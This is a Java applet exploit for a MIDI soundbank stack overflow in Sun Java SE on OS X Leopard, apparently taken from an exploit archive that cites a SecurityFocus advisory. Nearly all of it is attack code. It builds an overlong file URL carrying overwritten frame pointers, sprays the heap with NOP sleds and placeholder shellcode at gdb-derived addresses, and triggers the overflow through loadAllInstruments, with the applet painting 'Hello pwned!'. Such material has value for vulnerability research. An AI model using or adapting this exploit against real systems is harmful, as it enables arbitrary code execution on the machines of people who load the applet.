169 lines
No EOL
6.2 KiB
Java
169 lines
No EOL
6.2 KiB
Java
source: https://www.securityfocus.com/bid/36881/info
|
|
|
|
Sun has released updates to address multiple security vulnerabilities in Java SE.
|
|
|
|
Successful exploits may allow attackers to bypass certain security restrictions, run untrusted applets with elevated privileges, execute arbitrary code, and cause denial-of-service conditions. Other attacks are also possible.
|
|
|
|
These issues are addressed in the following releases:
|
|
|
|
JDK and JRE 6 Update 17
|
|
JDK and JRE 5.0 Update 22
|
|
SDK and JRE 1.4.2_24
|
|
SDK and JRE 1.3.1_27
|
|
|
|
*/
|
|
import javax.sound.midi.*;
|
|
import java.io.*;
|
|
import java.net.*;
|
|
|
|
import java.awt.Graphics;
|
|
public class test extends java.applet.Applet
|
|
{
|
|
public static Synthesizer synth;
|
|
Soundbank soundbank;
|
|
|
|
public void init()
|
|
{
|
|
String fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581
|
|
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13-
|
|
b05-237)
|
|
|
|
// heap sprayed info starts at 0x25580000+12 but keep in mind we
|
|
need to be fairly ascii safe.
|
|
// 0x20 is not usable
|
|
byte[] frame = {
|
|
(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp
|
|
(byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip
|
|
(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25 // frame 0 - edx
|
|
};
|
|
|
|
String mal = new String(frame);
|
|
|
|
//System.out.println(mal);
|
|
|
|
fName = "file://" + fName + mal;
|
|
try
|
|
{
|
|
synth = MidiSystem.getSynthesizer();
|
|
synth.open();
|
|
System.out.println("Spray heap\n");
|
|
|
|
String shellcode = "\u41424344" + repeat('\u9090',1000) +
|
|
"\u30313233"; // This is just a nop sled with some heading and
|
|
trailing markers.
|
|
int mb = 1024;
|
|
|
|
// Sotirov / Dowd foo follows.
|
|
// http://taossa.com/archive/bh08sotirovdowd.pdf
|
|
|
|
// Limit the shellcode length to 100KB
|
|
if (shellcode.length() > 100*1024)
|
|
{
|
|
throw new RuntimeException();
|
|
}
|
|
// Limit the heap spray size to 1GB, even though in practice the
|
|
Java
|
|
// heap for an applet is limited to 100MB
|
|
if (mb > 1024)
|
|
{
|
|
throw new RuntimeException();
|
|
}
|
|
// Array of strings containing shellcode
|
|
String[] mem = new String[1024];
|
|
|
|
// A buffer for the nop slide and shellcode
|
|
StringBuffer buffer = new StringBuffer(1024*1024/2);
|
|
|
|
// Each string takes up exactly 1MB of space
|
|
//
|
|
// header nop slide shellcode NULL
|
|
// 12 bytes 1MB-12-2-x x bytes 2 bytes
|
|
|
|
// Build padding up to the first exception. We will need to set
|
|
the eax address after this padding
|
|
// First usable addresses begin at 0x25580000+0x2121. Unfortunately
|
|
0x20 in our addresses caused issues.
|
|
// 0x2121 is 8481 in decimal, we subtract a few bytes for munging.
|
|
|
|
for (int i = 1; i < (8481/2)-4; i++)
|
|
{
|
|
buffer.append('\u4848');
|
|
}
|
|
|
|
// (gdb) x/10a 0x25582122-4
|
|
// 0x2558211e: 0x48484848 0x20202020 0x20202020 0x20202020
|
|
// 0x2558212e: 0x20202020 0x20202020 0x20202020 0x20202020
|
|
// 0x2558213e: 0x20202020 0x20202020
|
|
|
|
// Set the call address
|
|
// 0x188fd81b
|
|
<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>:
|
|
call *0x2a8(%eax)
|
|
|
|
buffer.append('\u2122');
|
|
buffer.append('\u2558');
|
|
|
|
// 0x2a8 is 680 in decimal, once again we need filler for making
|
|
this a usable address location.
|
|
for (int i = 1; i < (680/2)-1; i++)
|
|
{
|
|
buffer.append('\u4848');
|
|
}
|
|
|
|
// where do we wanna go? 0x25582525 is right in the middle of the
|
|
following nop sled
|
|
// (gdb) x/5x 0x25582525
|
|
// 0x25582525: 0x90909090 0x90909090 0x90909090 0x90909090
|
|
// 0x25582535: 0x90909090
|
|
|
|
buffer.append('\u2525');
|
|
buffer.append('\u2558');
|
|
|
|
// We are gonna place the shellcode after this so simply fill
|
|
in remaining space with nops!
|
|
for (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++)
|
|
{
|
|
buffer.append('\u9090');
|
|
}
|
|
|
|
// Append the shellcode
|
|
buffer.append(shellcode);
|
|
|
|
// Run the garbage collector
|
|
Runtime.getRuntime().gc();
|
|
|
|
// Fill the heap with copies of the string
|
|
try
|
|
{
|
|
for (int i=0; i<mb; i++)
|
|
{
|
|
mem[i] = buffer.toString();
|
|
}
|
|
}
|
|
catch (OutOfMemoryError err)
|
|
{
|
|
// do nothing
|
|
}
|
|
|
|
// Trigger the stack overflow.
|
|
synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName)));
|
|
}
|
|
catch(Exception e)
|
|
{
|
|
System.out.println(e);
|
|
}
|
|
}
|
|
public void paint(Graphics g)
|
|
{
|
|
g.drawString("Hello pwned!", 50, 25);
|
|
}
|
|
public static String repeat(char c,int i)
|
|
{
|
|
String tst = "";
|
|
for(int j = 0; j < i; j++)
|
|
{
|
|
tst = tst+c;
|
|
}
|
|
return tst;
|
|
}
|
|
} |